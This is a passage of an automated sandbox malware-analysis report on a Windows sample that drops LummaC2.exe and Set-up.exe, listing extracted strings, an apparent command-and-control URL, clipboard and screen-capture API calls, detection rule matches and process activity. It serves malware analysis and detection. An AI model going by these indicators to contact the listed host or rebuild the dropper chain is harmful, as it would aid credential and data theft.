22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 12 Jan 2025 16:45:26 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 12 Jan 2025 16:45:28 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: http://.css
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: http://.jpg
Source: Set-up.exe.0.dr | String found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ10
Source: Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220
Source: Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220?argument=0
Source: Set-up.exe, 00000003.00000003.2290027870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2289789125.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290098678.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2291369007.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290126041.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220?argument=0J
Source: Set-up.exe, 00000003.00000002.2291930851.000000000156E000.00000004.00000001.01000000.00000007.sdmp | String found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220http://home.twelve12vs.top/AvWHJxAVCxPehbRi
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: http://html4/loose.dtd
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr | String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr | String found in binary or memory: https://curl.se/docs/hsts.html
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: https://httpbin.org/ip
Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.dr | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 2_2_00E278A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, | 2_2_00E278A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe | Code function: 2_2_00E278A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, | 2_2_00E278A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E27A20 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00E27A20

      System Summary

      Source: jo0PnKm2Lg.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
      Source: 0.0.jo0PnKm2Lg.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2C0102_2_00E2C010
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF87302_2_00DF8730
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D0E02_2_00E2D0E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2B8C52_2_00E2B8C5
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E170D02_2_00E170D0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E198B02_2_00E198B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E098802_2_00E09880
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF38B02_2_00DF38B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E348602_2_00E34860
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1686D2_2_00E1686D
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E090432_2_00E09043
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0C9F02_2_00E0C9F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E251C02_2_00E251C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D9A02_2_00E2D9A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E211682_2_00E21168
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E351502_2_00E35150
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF29102_2_00DF2910
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E061002_2_00E06100
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0DAF02_2_00E0DAF0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1B2C32_2_00E1B2C3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E072C92_2_00E072C9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E02ACB2_2_00E02ACB
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF92F02_2_00DF92F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E14ADF2_2_00E14ADF
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF2AE02_2_00DF2AE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF62E02_2_00DF62E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E061002_2_00E06100
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF5A802_2_00DF5A80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E172612_2_00E17261
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E022462_2_00E02246
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF8A702_2_00DF8A70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E312502_2_00E31250
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF42602_2_00DF4260
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0E2302_2_00E0E230
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E34BE02_2_00E34BE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1CB912_2_00E1CB91
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFEB5F2_2_00DFEB5F
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E18B702_2_00E18B70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2EB402_2_00E2EB40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E08B3B2_2_00E08B3B
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFB3302_2_00DFB330
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFF3302_2_00DFF330
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E054C02_2_00E054C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2ECD92_2_00E2ECD9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1C4A02_2_00E1C4A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E10CB12_2_00E10CB1
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0C4B62_2_00E0C4B6
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1BC9A2_2_00E1BC9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33C602_2_00E33C60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E254702_2_00E25470
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E064442_2_00E06444
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E274202_2_00E27420
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E19C302_2_00E19C30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E19C102_2_00E19C10
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E21DE02_2_00E21DE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E215EE2_2_00E215EE
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFADD02_2_00DFADD0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2E5F02_2_00E2E5F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33DC02_2_00E33DC0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0B5A02_2_00E0B5A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E22DA32_2_00E22DA3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E335AA2_2_00E335AA
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF4D802_2_00DF4D80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0A5802_2_00E0A580
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFD5AD2_2_00DFD5AD
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1BD9A2_2_00E1BD9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E345602_2_00E34560
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1057D2_2_00E1057D
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF75402_2_00DF7540
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E135002_2_00E13500
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0151F2_2_00E0151F
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E106EF2_2_00E106EF
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33EA02_2_00E33EA0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2CE802_2_00E2CE80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E34E802_2_00E34E80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF2EB02_2_00DF2EB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E02E602_2_00E02E60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E276402_2_00E27640
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1A6482_2_00E1A648
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0DE202_2_00E0DE20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E16E202_2_00E16E20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E216072_2_00E21607
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E12FE02_2_00E12FE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E187F72_2_00E187F7
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1EFB02_2_00E1EFB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF97B02_2_00DF97B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1B7702_2_00E1B770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF5F402_2_00DF5F40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33F402_2_00E33F40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF67702_2_00DF6770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E247572_2_00E24757
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E18F302_2_00E18F30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E077032_2_00E07703
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0E7102_2_00E0E710
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: String function: 00E054B0 appears 110 times
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: String function: 00DF7FE0 appears 45 times
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: String function: 00C4A315 appears 72 times
      Source: jo0PnKm2Lg.exe, 00000000.00000000.2179001382.0000000000F97000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSet-up.exe4 vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2189192290.000000000171E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exeBinary or memory string: OriginalFilenameSet-up.exe4 vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: jo0PnKm2Lg.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
      Source: 0.0.jo0PnKm2Lg.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
      Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
      Source: classification engineClassification label: mal100.troj.evad.winEXE@5/3@8/2
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D9A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_00E2D9A0
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jo0PnKm2Lg.exe.logJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMutant created: NULL
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\LummaC2.exeJump to behavior
      Source: jo0PnKm2Lg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: jo0PnKm2Lg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: jo0PnKm2Lg.exeReversingLabs: Detection: 76%
      Source: jo0PnKm2Lg.exeVirustotal: Detection: 69%
      Source: unknownProcess created: C:\Users\user\Desktop\jo0PnKm2Lg.exe "C:\Users\user\Desktop\jo0PnKm2Lg.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: jo0PnKm2Lg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: jo0PnKm2Lg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: jo0PnKm2Lg.exeStatic file information: File size 8259584 > 1048576
      Source: jo0PnKm2Lg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7dfe00
      Source: jo0PnKm2Lg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
